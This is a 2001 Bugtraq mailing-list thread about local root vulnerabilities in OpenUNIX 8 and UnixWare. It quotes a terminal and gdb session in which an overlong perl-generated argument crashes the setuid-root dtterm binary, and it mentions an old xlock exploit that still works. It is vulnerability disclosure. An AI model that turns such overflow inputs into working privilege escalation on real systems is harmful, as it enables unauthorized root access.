[22784] in bugtraq
Re: OpenUNIX 8 & Unixware possible local root
daemon@ATHENA.MIT.EDU (Aycan Irican)
Wed Oct 3 17:43:29 2001
Message-ID: <3BBB518E.8020503@prosoft.com.tr>
Date: Wed, 03 Oct 2001 20:57:34 +0300
From: Aycan Irican <aycan@prosoft.com.tr>
MIME-Version: 1.0
To: KF <dotslash@snosoft.com>
Cc: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Yes, I read yours...It looks like it's a multiple vendor shared
library(libDtTerm.so) problem to me.
Also Caldera must supply a patch for OpenUNIX 8 xlock vulnerability. I
sent a mail to "security-alert" a few days ago about xlock vulnerability
but they told me that they put an unofficial patch for Unixware 7,
OpenUNIX 8 still VULNERABLE (patch is not applicable on OpenUNIX 8). I
think this is a serious bug.
For example in earlier 1999 I remember, K2 released an exploit for
unixware 7 xlock vulnerability and any standard user that can make a
little modification get root access on OpenUNIX 8 TODAY (I got root).
Hey man, exploit is around 2 years old and it worked.
KF wrote:
>This goes along with a mailing from earlier this morning ... I stated
>that
>I was able to make ALL suid / sgid dt* files core dump except the dtmail
>binary...
>-KF
>
>Aycan Irican wrote:
>
>>-----BEGIN PGP SIGNED MESSAGE-----
>>Hash: SHA1
>>
>>Another dt series bug...
>>
>>$ uname -a
>>OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5
>>$ id
>>uid=101(fixxxer) gid=1(other)
>>$ ls -al /usr/dt/bin/dtterm
>>- -r-sr-xr-x 1 root bin 60892 Haz 10 05:03
>>/usr/dt/bin/dtterm
>>$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
>>Warning: Missing charsets in String to FontSet conversion
>>Warning: Missing charsets in String to FontSet conversion
>>Memory fault
>>
>> # /usr/gnu/bin/gdb /usr/dt/bin/dtterm
>>(no debugging symbols found)...
>>(gdb) set args -tn `perl -e 'print "A"x1040'`
>>(gdb) run
>>Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
>>(no debugging symbols found)...(no debugging symbols found)...
>>...
>>..
>>[New LWP 2]
>>
>> Program received signal SIGSEGV, Segmentation fault.
>>0xbff9a4b8 in strncmp () from /usr/lib/libc.so.1
>>[New Thread 1]
>>(gdb)set args -tn `perl -e 'print "A"x1042'`
>>(gdb) run
>>Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1042'`
>>(no debugging symbols found)...(no debugging symbols found)...
>>[New LWP 2]
>>
>> Program received signal SIGSEGV, Segmentation fault.
>>0xbff3abca in _mergeEnv () from /usr/dt/lib/libDtTerm.so.1
>>[New Thread 1]
>>(gdb)q
>>
>>self-explained...
>>enjoy...
>>
>>- --
>>Aycan ]rican
>>Systems Engineer
>>Prosoft Communication Systems Ltd.
>>Resit Galip Cad. 85/2 Gaziosmanpa~a 06700 Ankara
>>Tel:+90-312-446-6616 Fax:+90-312-446-2423
>>-----BEGIN PGP SIGNATURE-----
>>Version: GnuPG v1.0.6 (GNU/Linux)
>>Comment: For info see http://www.gnupg.org
>>
>>iD8DBQE7uVaiJZJwgy0AK78RAsbKAJ0Y8YiCi+yagy2ep42v8wfsu+dsFQCdFIUt
>>5M67ZahjhrfqnvdlMsqE4SM=
>>=CNXa
>>-----END PGP SIGNATURE-----
>>
